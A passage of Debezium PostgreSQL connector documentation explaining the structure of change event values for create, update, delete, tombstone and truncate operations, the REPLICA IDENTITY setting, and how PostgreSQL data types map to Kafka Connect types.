`column.include.list` connector configuration properties allow you to capture only a subset of table columns, all columns in a primary or unique key are always included in the event's key.\n====\n\n[WARNING]\n====\nIf the table does not have a primary or unique key, then the change event's key is null. The rows in a table without a primary or unique key constraint cannot be uniquely identified.\n====\n\n\/\/ Type: concept\n\/\/ ModuleID: about-values-in-debezium-postgresql-change-events\n\/\/ Title: About values in {prodname} PostgreSQL change events\n[[postgresql-change-events-value]]\n=== Change event values\n\nThe value in a change event is a bit more complicated than the key. Like the key, the value has a `schema` section and a `payload` section. The `schema` section contains the schema that describes the `Envelope` structure of the `payload` section, including its nested fields. Change events for operations that create, update or delete data all have a value payload with an envelope structure.\n\nConsider the same sample table that was used to show an example of a change event key:\n\n[source,sql,indent=0]\n----\nCREATE TABLE customers (\n id SERIAL,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL,\n PRIMARY KEY(id)\n);\n----\n\nThe value portion of a change event for a change to this table varies according to the `REPLICA IDENTITY` setting and the operation that the event is for.\n\nifdef::product[]\nDetails follow in these sections:\n\n* <<postgresql-replica-identity, Replica identity>>\n* <<postgresql-create-events,_create_ events>>\n* <<postgresql-update-events,_update_ events>>\n* <<postgresql-primary-key-updates, Primary key updates>>\n* <<postgresql-delete-events,_delete_ events>>\n* <<postgresql-tombstone-events, Tombstone events>>\nendif::product[]\n\n\/\/ Type: continue\n[[postgresql-replica-identity]]\n=== Replica identity\n\nlink:https:\/\/www.postgresql.org\/docs\/current\/static\/sql-altertable.html#SQL-CREATETABLE-REPLICA-IDENTITY[REPLICA IDENTITY] is a PostgreSQL-specific table-level setting that determines the amount of information that is available to the logical decoding plug-in for `UPDATE` and `DELETE` events. More specifically, the setting of `REPLICA IDENTITY` controls what (if any) information is available for the previous values of the table columns involved, whenever an `UPDATE` or `DELETE` event occurs.\n\nThere are 4 possible values for `REPLICA IDENTITY`:\n\n* `DEFAULT` - The default behavior is that `UPDATE` and `DELETE` events contain the previous values for the primary key columns of a table if that table has a primary key. For an `UPDATE` event, only the primary key columns with changed values are present.\n+\nIf a table does not have a primary key, the connector does not emit `UPDATE` or `DELETE` events for that table. For a table without a primary key, the connector emits only _create_ events. Typically, a table without a primary key is used for appending messages to the end of the table, which means that `UPDATE` and `DELETE` events are not useful.\n* `NOTHING` - Emitted events for `UPDATE` and `DELETE` operations do not contain any information about the previous value of any table column.\n* `FULL` - Emitted events for `UPDATE` and `DELETE` operations contain the previous values of all columns in the table.\n* `INDEX` _index-name_ - Emitted events for `UPDATE` and `DELETE` operations contain the previous values of the columns contained in the specified index. `UPDATE` events also contain the indexed columns with the updated values.\n\n\/\/ Type: continue\n[[postgresql-create-events]]\n=== _create_ events\n\nThe following example shows the value portion of a change event that the connector generates for an operation that creates data in the `customers` table:\n\n[source,json,options=\"nowrap\",indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ],\n \"optional\": true,\n \"name\": \"PostgreSQL_server.inventory.customers.Value\", \/\/ <2>\n \"field\": \"before\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ],\n \"optional\": true,\n \"name\": \"PostgreSQL_server.inventory.customers.Value\",\n \"field\": \"after\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"connector\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_ms\"\n },\n {\n \"type\": \"boolean\",\n \"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"schema\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"table\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"txId\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"lsn\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"xmin\"\n }\n ],\n \"optional\": false,\n \"name\": \"io.debezium.connector.postgresql.Source\", \/\/ <3>\n \"field\": \"source\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"op\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"ts_ms\"\n }\n ],\n \"optional\": false,\n \"name\": \"PostgreSQL_server.inventory.customers.Envelope\" \/\/ <4>\n },\n \"payload\": { \/\/ <5>\n \"before\": null, \/\/ <6>\n \"after\": { \/\/ <7>\n \"id\": 1,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"source\": { \/\/ <8>\n \"version\": \"{debezium-version}\",\n \"connector\": \"postgresql\",\n \"name\": \"PostgreSQL_server\",\n \"ts_ms\": 1559033904863,\n \"snapshot\": true,\n \"db\": \"postgres\",\n \"sequence\": \"[\\\"24023119\\\",\\\"24023128\\\"]\"\n \"schema\": \"public\",\n \"table\": \"customers\",\n \"txId\": 555,\n \"lsn\": 24023128,\n \"xmin\": null\n },\n \"op\": \"c\", \/\/ <9>\n \"ts_ms\": 1559033904863 \/\/ <10>\n }\n}\n----\n\n\n.Descriptions of _create_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The value's schema, which describes the structure of the value's payload. A change event's value schema is the same in every change event that the connector generates for a particular table.\n\n|2\n|`name`\na|In the `schema` section, each `name` field specifies the schema for a field in the value's payload. +\n +\n`PostgreSQL_server.inventory.customers.Value` is the schema for the payload's `before` and `after` fields. This schema is specific to the `customers` table. +\n +\nNames of schemas for `before` and `after` fields are of the form `_logicalName_._tableName_.Value`, which ensures that the schema name is unique in the database. This means that when using the {link-prefix}:{link-avro-serialization}[Avro converter], the resulting Avro schema for each table in each logical source has its own evolution and history.\n\n|3\n|`name`\na|`io.debezium.connector.postgresql.Source` is the schema for the payload's `source` field. This schema is specific to the PostgreSQL connector. The connector uses it for all events that it generates.\n\n|4\n|`name`\na|`PostgreSQL_server.inventory.customers.Envelope` is the schema for the overall structure of the payload, where `PostgreSQL_server` is the connector name, `inventory` is the database, and `customers` is the table.\n\n|5\n|`payload`\n|The value's actual data. This is the information that the change event is providing. +\n +\nIt may appear that the JSON representations of the events are much larger than the rows they describe. This is because the JSON representation must include the schema and the payload portions of the message.\nHowever, by using the {link-prefix}:{link-avro-serialization}[Avro converter], you can significantly decrease the size of the messages that the connector streams to Kafka topics.\n\n|6\n|`before`\na|An optional field that specifies the state of the row before the event occurred. When the `op` field is `c` for create, as it is in this example, the `before` field is `null` since this change event is for new content. +\n +\n[NOTE]\n====\nWhether or not this field is available is dependent on the {link-prefix}:{link-postgresql-connector}#postgresql-replica-identity[`REPLICA IDENTITY`] setting for each table.\n====\n\n|7\n|`after`\n|An optional field that specifies the state of the row after the event occurred. In this example, the `after` field contains the values of the new row's `id`, `first_name`, `last_name`, and `email` columns.\n\n|8\n|`source`\na|Mandatory field that describes the source metadata for the event. This field contains information that you can use to compare this event with other events, with regard to the origin of the events, the order in which the events occurred, and whether events were part of the same transaction. The source metadata includes:\n\n* {prodname} version\n* Connector type and name\n* Database and table that contains the new row\n* Stringified JSON array of additional offset information. The first value is always the last committed LSN, the second value is always the current LSN. Either value may be `null`.\n* Schema name\n* If the event was part of a snapshot\n* ID of the transaction in which the operation was performed\n* Offset of the operation in the database log\n* Timestamp for when the change was made in the database\n\n|9\n|`op`\na|Mandatory string that describes the type of operation that caused the connector to generate the event. In this example, `c` indicates that the operation created a row. Valid values are:\n\n* `c` = create\n* `u` = update\n* `d` = delete\n* `r` = read (applies to only snapshots)\n\n|10\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\n\/\/ Type: continue\n[[postgresql-update-events]]\n=== _update_ events\n\nThe value of a change event for an update in the sample `customers` table has the same schema as a _create_ event for that table. Likewise, the event value's payload has the same structure. However, the event value payload contains different values in an _update_ event. Here is an example of a change event value in an event that the connector generates for an update in the `customers` table:\n\n[source,json,indent=0,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"id\": 1\n },\n \"after\": { \/\/ <2>\n \"id\": 1,\n \"first_name\": \"Anne Marie\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"postgresql\",\n \"name\": \"PostgreSQL_server\",\n \"ts_ms\": 1559033904863,\n \"snapshot\": false,\n \"db\": \"postgres\",\n \"schema\": \"public\",\n \"table\": \"customers\",\n \"txId\": 556,\n \"lsn\": 24023128,\n \"xmin\": null\n },\n \"op\": \"u\", \/\/ <4>\n \"ts_ms\": 1465584025523 \/\/ <5>\n }\n}\n----\n\n.Descriptions of _update_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|An optional field that contains values that were in the row before the database commit. In this example, only the primary key column, `id`, is present because the table's {link-prefix}:{link-postgresql-connector}#postgresql-replica-identity[`REPLICA IDENTITY`] setting is, by default, `DEFAULT`.\n+\nFor an _update_ event to contain the previous values of all columns in the row, you would have to change the `customers` table by running `ALTER TABLE customers REPLICA IDENTITY FULL`.\n\n|2\n|`after`\n|An optional field that specifies the state of the row after the event occurred. In this example, the `first_name` value is now `Anne Marie`.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. The `source` field structure has the same fields as in a _create_ event, but some values are different. The source metadata includes:\n\n* {prodname} version\n* Connector type and name\n* Database and table that contains the new row\n* Schema name\n* If the event was part of a snapshot (alwas `false` for _update_ events)\n* ID of the transaction in which the operation was performed\n* Offset of the operation in the database log\n* Timestamp for when the change was made in the database\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. In an _update_ event value, the `op` field value is `u`, signifying that this row changed because of an update.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\n[NOTE]\n====\nUpdating the columns for a row's primary\/unique key changes the value of the row's key. When a key changes, {prodname} outputs _three_ events: a `DELETE` event and a {link-prefix}:{link-postgresql-connector}#postgresql-tombstone-events[tombstone event] with the old key for the row, followed by an event with the new key for the row. Details are in the next section.\n====\n\n\/\/ Type: continue\n[[postgresql-primary-key-updates]]\n=== Primary key updates\n\nAn `UPDATE` operation that changes a row's primary key field(s) is known\nas a primary key change. For a primary key change, in place of sending an `UPDATE` event record, the connector sends a `DELETE` event record for the old key and a `CREATE` event record for the new (updated) key. These events have the usual structure and content, and in addition, each one has a message header related to the primary key change:\n\n* The `DELETE` event record has `__debezium.newkey` as a message header. The value of this header is the new primary key for the updated row.\n\n* The `CREATE` event record has `__debezium.oldkey` as a message header. The value of this header is the previous (old) primary key that the updated row had.\n\n\/\/ Type: continue\n[[postgresql-delete-events]]\n=== _delete_ events\n\nThe value in a _delete_ change event has the same `schema` portion as _create_ and _update_ events for the same table. The `payload` portion in a _delete_ event for the sample `customers` table looks like this:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"id\": 1\n },\n \"after\": null, \/\/ <2>\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"postgresql\",\n \"name\": \"PostgreSQL_server\",\n \"ts_ms\": 1559033904863,\n \"snapshot\": false,\n \"db\": \"postgres\",\n \"schema\": \"public\",\n \"table\": \"customers\",\n \"txId\": 556,\n \"lsn\": 46523128,\n \"xmin\": null\n },\n \"op\": \"d\", \/\/ <4>\n \"ts_ms\": 1465581902461 \/\/ <5>\n }\n}\n----\n\n.Descriptions of _delete_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|Optional field that specifies the state of the row before the event occurred. In a _delete_ event value, the `before` field contains the values that were in the row before it was deleted with the database commit. +\n +\nIn this example, the `before` field contains only the primary key column because the table's {link-prefix}:{link-postgresql-connector}#postgresql-replica-identity[`REPLICA IDENTITY`] setting is `DEFAULT`.\n\n|2\n|`after`\n|Optional field that specifies the state of the row after the event occurred. In a _delete_ event value, the `after` field is `null`, signifying that the row no longer exists.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. In a _delete_ event value, the `source` field structure is the same as for _create_ and _update_ events for the same table. Many `source` field values are also the same. In a _delete_ event value, the `ts_ms` and `lsn` field values, as well as other values, might have changed. But the `source` field in a _delete_ event value provides the same metadata:\n\n* {prodname} version\n* Connector type and name\n* Database and table that contained the deleted row\n* Schema name\n* If the event was part of a snapshot (alwas `false` for _delete_ events)\n* ID of the transaction in which the operation was performed\n* Offset of the operation in the database log\n* Timestamp for when the change was made in the database\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. The `op` field value is `d`, signifying that this row was deleted.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\nA _delete_ change event record provides a consumer with the information it needs to process the removal of this row.\n\n[WARNING]\n====\nFor a consumer to be able to process a _delete_ event generated for a table that does not have a primary key, set the table's `REPLICA IDENTITY` to `FULL`. When a table does not have a primary key and the table's `REPLICA IDENTITY` is set to `DEFAULT` or `NOTHING`, a _delete_ event has no `before` field.\n====\n\nPostgreSQL connector events are designed to work with link:{link-kafka-docs}#compaction[Kafka log compaction]. Log compaction enables removal of some older messages as long as at least the most recent message for every key is kept. This lets Kafka reclaim storage space while ensuring that the topic contains a complete data set and can be used for reloading key-based state.\n\n\/\/ Type: continue\n[[postgresql-tombstone-events]]\n.Tombstone events\nWhen a row is deleted, the _delete_ event value still works with log compaction, because Kafka can remove all earlier messages that have that same key. However, for Kafka to remove all messages that have that same key, the message value must be `null`. To make this possible, the PostgreSQL connector follows a _delete_ event with a special _tombstone_ event that has the same key but a `null` value.\n\n\/\/ Type: continue\n[[postgresql-truncate-events]]\n=== _truncate_ events\n\nA _truncate_ change event signals that a table has been truncated.\nThe message key is `null` in this case, the message value looks like this:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"source\": { \/\/ <1>\n \"version\": \"{debezium-version}\",\n \"connector\": \"postgresql\",\n \"name\": \"PostgreSQL_server\",\n \"ts_ms\": 1559033904863,\n \"snapshot\": false,\n \"db\": \"postgres\",\n \"schema\": \"public\",\n \"table\": \"customers\",\n \"txId\": 556,\n \"lsn\": 46523128,\n \"xmin\": null\n },\n \"op\": \"t\", \/\/ <2>\n \"ts_ms\": 1559033904961 \/\/ <3>\n }\n}\n----\n\n.Descriptions of _truncate_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`source`\na|Mandatory field that describes the source metadata for the event. In a _truncate_ event value, the `source` field structure is the same as for _create_, _update_, and _delete_ events for the same table, provides this metadata:\n\n* {prodname} version\n* Connector type and name\n* Database and table that contains the new row\n* Schema name\n* If the event was part of a snapshot (alwas `false` for _delete_ events)\n* ID of the transaction in which the operation was performed\n* Offset of the operation in the database log\n* Timestamp for when the change was made in the database\n\n|2\n|`op`\na|Mandatory string that describes the type of operation. The `op` field value is `t`, signifying that this table was truncated.\n\n|3\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\nIn case a single `TRUNCATE` statement applies to multiple tables,\none _truncate_ change event record for each truncated table will be emitted.\n\nNote that since _truncate_ events represent a change made to an entire table and don't have a message key,\nunless you're working with topics with a single partition,\nthere are no ordering guarantees for the change events pertaining to a table (_create_, _update_, etc.) and _truncate_ events for that table.\nFor instance a consumer may receive an _update_ event only after a _truncate_ event for that table,\nwhen those events are read from different partitions.\n\n\/\/ Type: reference\n\/\/ ModuleID: how-debezium-postgresql-connectors-map-data-types\n\/\/ Title: How {prodname} PostgreSQL connectors map data types\n[[postgresql-data-types]]\n== Data type mappings\n\nThe PostgreSQL connector represents changes to rows with events that are structured like the table in which the row exists. The event contains a field for each column value. How that value is represented in the event depends on the PostgreSQL data type of the column. The following sections describe how the connector maps PostgreSQL data types to a _literal type_ and a _semantic type_ in event fields.\n\n* _literal type_ describes how the value is literally represented using Kafka Connect schema types: `INT8`, `INT16`, `INT32`, `INT64`, `FLOAT32`, `FLOAT64`, `BOOLEAN`, `STRING`, `BYTES`, `ARRAY`, `MAP`, and `STRUCT`.\n\n* _semantic type_ describes how the Kafka Connect schema captures the _meaning_ of the field using the name of the Kafka Connect schema for the field.\n\nifdef::product[]\nDetails are in the following sections:\n\n* xref:postgresql-basic-types[]\n* xref:postgresql-temporal-types[]\n* xref:postgresql-timestamp-type[]\n* xref:postgresql-decimal-types[]\n* xref:postgresql-hstore-type[]\n* xref:postgresql-domain-types[]\n* xref:postgresql-network-address-types[]\n* xref:postgresql-postgis-types[]\n* xref:postgresql-toasted-values[]\n\nendif::product[]\n\n[id=\"postgresql-basic-types\"]\n=== Basic types\n\nThe following table describes how the connector maps basic types.\n\n.Mappings for PostgreSQL basic data types\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`BOOLEAN`\n|`BOOLEAN`\n|n\/a\n\n|`BIT(1)`\n|`BOOLEAN`\n|n\/a\n\n|`BIT( > 1)`\n|`BYTES`\n|`io.debezium.data.Bits` +\n +\nThe `length` schema parameter contains an integer that represents the number of bits. The resulting `byte[]` contains the bits in little-endian form and is sized to contain the specified number of bits. For example, `numBytes = n\/8 + (n % 8 == 0 ? 0 : 1)` where `n` is the number of bits.\n\n|`BIT VARYING[(M)]`\n|`BYTES`\n|`io.debezium.data.Bits` +\n +\nThe `length` schema parameter contains an integer that represents the number of bits (2^31 - 1 in case no length is given for the column). The resulting `byte[]` contains the bits in little-endian form and is sized based on the content. The specified size `(M)` is stored in the length parameter of the `io.debezium.data.Bits` type.\n\n|`SMALLINT`, `SMALLSERIAL`\n|`INT16`\n|n\/a\n\n|`INTEGER`, `SERIAL`\n|`INT32`\n|n\/a\n\n|`BIGINT`, `BIGSERIAL`, `OID`\n|`INT64`\n|n\/a\n\n|`REAL`\n|`FLOAT32`\n|n\/a\n\n|`DOUBLE PRECISION`\n|`FLOAT64`\n|n\/a\n\n|`CHAR[(M)]`\n|`STRING`\n|n\/a\n\n|`VARCHAR[(M)]`\n|`STRING`\n|n\/a\n\n|`CHARACTER[(M)]`\n|`STRING`\n|n\/a\n\n|`CHARACTER VARYING[(M)]`\n|`STRING`\n|n\/a\n\n|`TIMESTAMPTZ`, `TIMESTAMP WITH TIME ZONE`\n|`STRING`\n|`io.debezium.time.ZonedTimestamp` +\n +\nA string representation of a timestamp with timezone information, where the timezone is GMT.\n\n|`TIMETZ`, `TIME WITH TIME ZONE`\n|`STRING`\n|`io.debezium.time.ZonedTime` +\n +\nA string representation of a time value with timezone information, where the timezone is GMT.\n\n|`INTERVAL [P]`\n|`INT64`\n|`io.debezium.time.MicroDuration` +\n(default) +\n +\nThe approximate number of microseconds for a time interval using the `365.25 \/ 12.0` formula for days per month average.\n\n|`INTERVAL [P]`\n|`STRING`\n|`io.debezium.time.Interval` +\n(when `interval.handling.mode` is set to `string`) +\n +\nThe string representation of the interval value that follows the pattern `P<years>Y<months>M<days>DT<hours>H<minutes>M<seconds>S`, for example, `P1Y2M3DT4H5M6.78S`.\n\n|`BYTEA`\n|`BYTES` or `STRING`\n|n\/a +\n +\nEither the raw bytes (the default), a base64-encoded string, or a hex-encoded string, based on the connector's {link-prefix}:{link-postgresql-connector}#postgresql-property-binary-handling-mode[binary handling mode] setting.\n\n|`JSON`, `JSONB`\n|`STRING`\n|`io.debezium.data.Json` +\n +\nContains the string representation of a JSON document, array, or scalar.\n\n|`XML`\n|`STRING`\n|`io.debezium.data.Xml` +\n +\nContains the string representation of an XML document.\n\n|`UUID`\n|`STRING`\n|`io.debezium.data.Uuid` +\n +\nContains the string representation of a PostgreSQL UUID value.\n\n|`POINT`\n|`STRUCT`\n|`io.debezium.data.geometry.Point` +\n +\nContains a structure with two `FLOAT64` fields, `(x,y)`. Each field represents the coordinates of a geometric point.\n\n|`LTREE`\n|`STRING`\n|`io.debezium.data.Ltree` +\n +\nContains the string representation of a PostgreSQL LTREE value.\n\n|`CITEXT`\n|`STRING`\n|n\/a\n\n|`INET`\n|`STRING`\n|n\/a\n\n|`INT4RANGE`\n|`STRING`\n|n\/a +\n +\nRange of integer.\n\n|`INT8RANGE`\n|`STRING`\n|n\/a +\n +\nRange of `bigint`.\n\n|`NUMRANGE`\n|`STRING`\n|n\/a +\n +\nRange of `numeric`.\n\n|`TSRANGE`\n|`STRING`\n|n\/a +\n +\nContains the string representation of a timestamp range without a time zone.\n\n|`TSTZRANGE`\n|`STRING`\n|n\/a +\n +\nContains the string representation of a timestamp range with the local system time zone.\n\n|`DATERANGE`\n|`STRING`\n|n\/a +\n +\nContains the string representation of a date range. It always has an exclusive upper-bound.\n\n|`ENUM`\n|`STRING`\n|`io.debezium.data.Enum` +\n +\nContains the string representation of the PostgreSQL `ENUM` value. The set of allowed values is maintained in the `allowed` schema parameter.\n\n|===\n\n[id=\"postgresql-temporal-types\"]\n=== Temporal types\n\nOther than PostgreSQL's `TIMESTAMPTZ` and `TIMETZ` data types, which contain time zone information, how temporal types are mapped depends on the value of the `time.precision.mode` connector configuration property. The following sections describe these mappings:\n\n* xref:postgresql-time-precision-mode-adaptive[`time.precision.mode=adaptive`]\n* xref:postgresql-time-precision-mode-adaptive-time-microseconds[`time.precision.mode=adaptive_time_microseconds`]\n* xref:postgresql-time-precision-mode-connect[`time.precision.mode=connect`]\n\n[[postgresql-time-precision-mode-adaptive]]\n.`time.precision.mode=adaptive`\nWhen the `time.precision.mode` property is set to `adaptive`, the default, the connector determines the literal type and semantic type based on the column's data type definition. This ensures that events _exactly_ represent the values in the database.\n\n.Mappings when `time.precision.mode` is `adaptive`\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`DATE`\n|`INT32`\n|`io.debezium.time.Date` +\n +\nRepresents the number of days since the epoch.\n\n|`TIME(1)`, `TIME(2)`, `TIME(3)`\n|`INT32`\n|`io.debezium.time.Time` +\n +\nRepresents the number of milliseconds past midnight, and does not include timezone information.\n\n|`TIME(4)`, `TIME(5)`, `TIME(6)`\n|`INT64`\n|`io.debezium.time.MicroTime` +\n +\nRepresents the number of microseconds past midnight, and does not include timezone information.\n\n|`TIMESTAMP(1)`, `TIMESTAMP(2)`, `TIMESTAMP(3)`\n|`INT64`\n|`io.debezium.time.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information.\n\n|`TIMESTAMP(4)`, `TIMESTAMP(5)`, `TIMESTAMP(6)`, `TIMESTAMP`\n|`INT64`\n|`io.debezium.time.MicroTimestamp` +\n +\nRepresents the number of microseconds since the epoch, and does not include timezone information.\n\n|===\n\n[[postgresql-time-precision-mode-adaptive-time-microseconds]]\n.`time.precision.mode=adaptive_time_microseconds`\nWhen the `time.precision.mode` configuration property is set to `adaptive_time_microseconds`, the connector determines the literal type and semantic type for temporal types based on the column's data type definition. This ensures that events _exactly_ represent the values in the database, except all `TIME` fields are captured as microseconds.\n\n.Mappings when `time.precision.mode` is `adaptive_time_microseconds`\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`DATE`\n|`INT32`\n|`io.debezium.time.Date` +\n +\nRepresents the number of days since the epoch.\n\n|`TIME([P])`\n|`INT64`\n|`io.debezium.time.MicroTime` +\n +\nRepresents the time value in microseconds and does not include timezone information. PostgreSQL allows precision `P` to be in the range 0-6 to store up to microsecond precision.\n\n|`TIMESTAMP(1)` , `TIMESTAMP(2)`, `TIMESTAMP(3)`\n|`INT64`\n|`io.debezium.time.Timestamp` +\n +\nRepresents the number of milliseconds past the epoch, and does not include timezone information.\n\n|`TIMESTAMP(4)` , `TIMESTAMP(5)`, `TIMESTAMP(6)`, `TIMESTAMP`\n|`INT64`\n|`io.debezium.time.MicroTimestamp` +\n +\nRepresents the number of microseconds past the epoch, and does not include timezone information.\n\n|===\n\n[[postgresql-time-precision-mode-connect]]\n.`time.precision.mode=connect`\nWhen the `time.precision.mode` configuration property is set to `connect`, the connector uses Kafka Connect logical types. This may be useful when consumers can handle only the built-in Kafka Connect logical types and are unable to handle variable-precision time values. However, since PostgreSQL supports microsecond precision, the events generated by a connector with the `connect` time precision mode *results in a loss of precision* when the database column has a _fractional second precision_ value that is greater than 3.\n\n.Mappings when `time.precision.mode` is `connect`\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`DATE`\n|`INT32`\n|`org.apache.kafka.connect.data.Date` +\n +\nRepresents the number of days since the epoch.\n\n|`TIME([P])`\n|`INT64`\n|`org.apache.kafka.connect.data.Time` +\n +\nRepresents the number of milliseconds since midnight, and does not include timezone information. PostgreSQL allows `P` to be in the range 0-6 to store up to microsecond precision, though this mode results in a loss of precision when `P` is greater than 3.\n\n|`TIMESTAMP([P])`\n|`INT64`\n|`org.apache.kafka.connect.data.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information. PostgreSQL allows `P` to be in the range 0-6 to store up to microsecond precision, though this mode results in a loss of precision when `P` is greater than 3.\n\n|===\n\n[id=\"postgresql-timestamp-type\"]\n=== TIMESTAMP type\n\nThe `TIMESTAMP` type represents a timestamp without time zone information.\nSuch columns are converted into an equivalent Kafka Connect value based on UTC. For example, the `TIMESTAMP` value \"2018-06-20 15:13:16.945104\" is represented by an `io.debezium.time.MicroTimestamp` with the value \"1529507596945104\" when `time.precision.mode` is not set to `connect`.\n\nThe timezone of the JVM running Kafka Connect and {prodname} does not affect this conversion.\n\nPostgreSQL supports using `+\/-infinite` values in `TIMESTAMP` columns.\nThese special values are converted to timestamps with value `9223372036825200000` in case of positive infinity or `-9223372036832400000` in case of negative infinity.\nThis behaviour mimics the standard behaviour of PostgreSQL JDBC driver - see `org.postgresql.PGStatement` interface for reference.\n\n[id=\"postgresql-decimal-types\"]\n=== Decimal types\n\nThe setting of the PostgreSQL connector configuration property, `decimal.handling.mode` determines how the connector maps decimal types.\n\nWhen the `decimal.handling.mode` property is set to `precise`, the connector uses the Kafka Connect `org.apache.kafka.connect.data.Decimal` logical type for all `DECIMAL` and `NUMERIC` columns. This is the default mode.\n\n.Mappings when `decimal.handling.mode` is `precise`\n[cols=\"28%a,17%a,55%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`NUMERIC[(M[,D])]`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal` +\n +\nThe `scale` schema parameter contains an integer representing how many digits the decimal point was shifted.\n\n|`DECIMAL[(M[,D])]`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal` +\n +\nThe `scale` schema parameter contains an integer representing how many digits the decimal point was shifted.\n\n|===\n\nThere is an exception to this rule.\nWhen the `NUMERIC` or `DECIMAL` types are used without scale constraints, the values coming from the database have a different (variable) scale for each value. In this case, the connector uses `io.debezium.data.VariableScaleDecimal`, which contains both the value and the scale of the transferred value.\n\n.Mappings of decimal types when there are no scale constraints\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`NUMERIC`\n|`STRUCT`\n|`io.debezium.data.VariableScaleDecimal` +\n +\nContains a structure with two fields: `scale` of type `INT32` that contains the scale of the transferred value and `value` of type `BYTES` containing the original value in an unscaled form.\n\n|`DECIMAL`\n|`STRUCT`\n|`io.debezium.data.VariableScaleDecimal` +\n 